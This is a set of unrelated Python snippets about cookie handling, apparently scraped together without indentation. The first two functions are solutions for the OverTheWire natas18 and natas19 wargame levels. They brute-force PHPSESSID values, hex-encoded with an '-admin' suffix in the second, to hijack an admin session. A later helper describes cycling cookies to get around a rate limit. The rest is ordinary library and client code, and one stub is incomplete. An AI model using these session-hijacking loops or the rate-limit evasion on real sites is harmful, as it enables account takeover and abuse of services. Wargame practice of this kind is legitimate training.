def session_handling():
sess = requests.Session()
auth_username = '******'
auth_password = '******'
_payload = {'username': '******', 'password': '******'}
# response = sess.get('http://natas18.natas.labs.overthewire.org/index.php', auth=HTTPBasicAuth(auth_username, auth_password))
# dissect_response(response)
response = sess.post('http://natas18.natas.labs.overthewire.org/index.php',
auth=HTTPBasicAuth(auth_username, auth_password),
data=_payload)
for i in range(1, 461):
new_cookie = RequestsCookieJar()
new_cookie.set(name="PHPSESSID",
value=str(i),
domain='natas18.natas.labs.overthewire.org',
path="/")
sess.cookies.update(new_cookie)
response = sess.get(
'http://natas18.natas.labs.overthewire.org/index.php',
auth=HTTPBasicAuth(auth_username, auth_password))
try:
response.text.index("are logged in as a regular")
print(str(i) + " non admin account")
except:
print(str(i) + " admin account ")
print(response.text)
break
def brute_force_PHPSESSID():
sess = requests.Session()
auth_username = '******'
auth_password = '******'
_payload = {'username': '******', 'password': '******'}
response = sess.post('http://natas19.natas.labs.overthewire.org/index.php',
auth=HTTPBasicAuth(auth_username, auth_password),
data=_payload)
for i in range(1, 461):
length = len(str(i))
string_i = str(i)
prefix = ""
for i in range(length):
prefix = prefix + "3" + string_i[i]
cookie_value = prefix + "2d61646d696e"
new_cookie = RequestsCookieJar()
new_cookie.set(name="PHPSESSID",
value=cookie_value,
domain='natas19.natas.labs.overthewire.org',
path="/")
sess.cookies.update(new_cookie)
response = sess.get(
'http://natas19.natas.labs.overthewire.org/index.php',
auth=HTTPBasicAuth(auth_username, auth_password))
try:
response.text.index("are logged in as a regular")
print(prefix + " 2d61646d696e" +
" non admin account: regular user")
except:
try:
response.text.index("Uninitialized string offset:")
print(prefix + " 2d61646d696e" + " uninitialized")
except:
try:
response.text.index(
"login with your admin account to retrieve credentials for"
)
print(prefix + " 2d61646d696e" +
" non admin account: homepage")
except:
print(prefix + " 2d61646d696e" + " admin account ")
print(response.text)
break
def loginwithcookies():
cookievalue=None
rsp =requests.post(loginurl,logindata)
cookiesjar = RequestsCookieJar()
#requests.post(loginurl,logindata,cookies=cookiesjar)
#cookiesjar.set("JSESSIONID",cookievalue)
return cookiesjar
pass
def set_cookies(*args: Union[Mapping[str, Any], str],
clear: bool = True) -> None:
"""Sets multiple cookies at once to cycle between. Takes same arguments as set_cookie.
Unlike set_cookie, this function allows for multiple cookies to be used at once.
This is so far the only way to circumvent the rate limit.
If clear is set to False the previously set cookies won't be cleared.
"""
if clear:
cookies.clear()
for cookie in args:
if isinstance(cookie, Mapping):
cookie = {k: str(v)
for k, v in cookie.items()
} # SimpleCookie needs a string
cookie = SimpleCookie(cookie)
jar = RequestsCookieJar()
jar.update(cookie)
cookies.append(jar)
def prepare_request(self, request):
"""Constructs a :class:`PreparedRequest <PreparedRequest>` for
transmission and returns it. The :class:`PreparedRequest` has settings
merged from the :class:`Request <Request>` instance and those of the
:class:`Session`.
:param request: :class:`Request` instance to prepare with this
session's settings.
:rtype: requests.PreparedRequest
"""
cookies = request.cookies or {}
# Bootstrap CookieJar.
if not isinstance(cookies, cookielib.CookieJar):
cookies = cookiejar_from_dict(cookies)
# Merge with session cookies
merged_cookies = merge_cookies(
merge_cookies(RequestsCookieJar(), self.cookies), cookies)
# Set environment's basic authentication if not explicitly set.
auth = request.auth
if self.trust_env and not auth and not self.auth:
auth = get_netrc_auth(request.url)
p = CuPreparedRequest()
p.prepare(
method=request.method.upper(),
url=request.url,
files=request.files,
data=request.data,
json=request.json,
headers=merge_setting(request.headers,
self.headers,
dict_class=CaseInsensitiveDict),
params=merge_setting(request.params, self.params),
auth=merge_setting(auth, self.auth),
cookies=merged_cookies,
hooks=merge_hooks(request.hooks, self.hooks),
)
return p
def __init__(self, base, username=None, password=None, site='default', state=None, unifios=None):
self.base = base
self.site = site
self.username = username
self.password = password
self._set_type(unifios)
self.session = True if state else False
self.cookies = requests.cookies.cookiejar_from_dict(json.loads(state)) if state else RequestsCookieJar()
if None == unifios:
self._check_unifios()
else:
self._set_type(unifios=unifios)